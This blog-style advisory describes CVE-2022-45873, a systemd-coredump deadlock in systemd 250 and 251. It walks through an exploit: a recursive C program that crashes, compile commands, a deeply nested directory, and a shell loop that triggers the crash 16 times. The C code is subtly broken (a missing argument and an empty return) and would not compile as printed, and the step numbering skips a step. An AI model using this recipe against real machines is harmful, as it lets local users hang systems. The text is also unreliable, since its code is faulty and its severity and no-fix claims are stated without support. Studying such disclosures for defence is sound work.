A recent vulnerability has been uncovered in systemd versions 250 and 251, identified as CVE-2022-45873, which allows local users to achieve a systemd-coredump deadlock by triggering a crash with a long backtrace. This exploit takes advantage of a weak point in the parse_elf_object function found in the shared/elf-util.c file. In this post, we'll delve into the details of this vulnerability, provide code snippets, and offer reference links for further understanding and mitigation.
The exploitation methodology for this vulnerability can be broken down into the following steps
1. Create a binary that crashes by calling a function recursively, leading to a stack overflow and causing a crash.
Place the binary in a deeply nested directory to ensure a long backtrace for the crash.
3. Trigger the crash 16 times when the MaxConnections=16 setting is configured for the systemd/units/systemd-coredump.socket file.
By doing this, an attacker can force a local deadlock in the systemd-coredump process, effectively rendering a targeted system unresponsive.
To create a binary that will crash by calling a function recursively, you can use this simple C code
#include <stdio.h>
void recursive_function(int counter) {
printf("Recursion level: %d\n", counter);
recursive_function(counter + 1);
}
int main() {
recursive_function();
return ;
}
Compile this code with gcc
gcc -o recursive_crash recursive_crash.c
To make the backtrace larger, move this binary to a deeply nested directory
mkdir -p a/a/a/a/a/a/a
mv recursive_crash a/a/a/a/a/a/a/
Now, run the binary multiple times to trigger the crash
for i in {1..16}; do
./a/a/a/a/a/a/a/recursive_crash
done
This vulnerability was discovered and reported by the following sources
1. The original disclosure of the vulnerability can be found at MITRE
2. The systemd GitHub repository provides further details on the vulnerable code: systemd GitHub
3. The National Vulnerability Database (NVD) provides technical details and impact analysis: NVD - CVE-2022-45873
Mitigation
As of now, there is no official fix released for this vulnerability. However, one possible mitigation is to lower the MaxConnections setting for the systemd-coredump.socket file to reduce the attack surface. Moreover, it is advisable to monitor process crashes closely and investigate any abnormal behavior. Monitor for any official patches or updates addressing this issue and make sure to apply them as soon as possible.
Conclusion
CVE-2022-45873 is a critical vulnerability that affects systemd versions 250 and 251. By leveraging a local user's capabilities, an attacker can force a deadlock in the systemd-coredump process and potentially halt a targeted system entirely. It's vital for systems administrators and security professionals to stay vigilant, watch out for updates, and apply any mitigating measures in the interim to prevent potential exploitation.
Timeline
Published on: 11/23/2022 23:15:00 UTC
Last modified on: 03/01/2023 14:27:00 UTC